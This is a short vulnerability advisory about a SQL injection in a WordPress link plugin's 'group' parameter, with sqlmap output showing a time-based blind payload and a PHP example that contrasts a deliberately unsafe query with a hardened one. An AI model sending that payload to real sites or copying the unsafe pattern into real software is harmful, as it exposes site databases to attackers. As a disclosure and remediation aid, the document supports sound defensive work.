Authenticated administrators can execute arbitrary SQL commands (there is no CSRF protection).
1. SQL injection (PrliLinksController::list_links())
Method: GET
Vulnerable parameter: group
Example PHP callstack:
PrliLinksController::route [/pretty-link/classes/controllers/PrliLinksController.php:34]
PrliLinksController::list_links [/pretty-link/classes/controllers/PrliLinksController.php:65]
wpdb::get_var
Sqlmap verification:
...
Parameter: group (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: page=pretty-link&group=1 AND (SELECT * FROM (SELECT(SLEEP(5)))VFpT)
...
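To illustrate the pattern in the callstack above (a raw GET parameter reaching wpdb::get_var) beside a hardened form, here is an added PHP example; it is not the plugin's own code, and the handler names, the table name and the nonce action are assumed for illustration.

```php
<?php
// Added illustration, not Pretty Link's code. Both functions take the WordPress
// $wpdb object; the table name "{$wpdb->prefix}example_links" is assumed.

// Vulnerable pattern (hypothetical): the request value is spliced straight into
// the SQL string, so anything placed in "group" is executed by $wpdb->get_var
// with the database user's privileges. A time-based blind probe such as the
// sqlmap payload above shows up as a ~5 second delay in the response.
function list_links_unsafe($wpdb) {
    $group = $_GET['group'];
    return $wpdb->get_var(
        "SELECT COUNT(*) FROM {$wpdb->prefix}example_links WHERE group_id = {$group}"
    );
}

// Hardened version: capability check, CSRF nonce, type cast, bound parameter.
function list_links_safe($wpdb) {
    // Only administrators may reach the handler at all.
    if (!current_user_can('manage_options')) {
        wp_die('Insufficient privileges');
    }
    // CSRF protection: the request must carry a nonce for this action
    // (nonce action name "prli_list_links" is assumed); the advisory notes
    // that no such check is present.
    check_admin_referer('prli_list_links');
    // A group id is a non-negative integer; discard anything else up front.
    $group = absint($_GET['group'] ?? 0);
    // Bind the value with %d so it can never be interpreted as SQL.
    $sql = $wpdb->prepare(
        "SELECT COUNT(*) FROM {$wpdb->prefix}example_links WHERE group_id = %d",
        $group
    );
    return $wpdb->get_var($sql);
}
```

From a detection standpoint, admin-page requests whose `group` value is anything other than a short integer, or that take several seconds longer than neighbouring requests, are the signal to alert on.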
--
Regards,
Marcin Probola,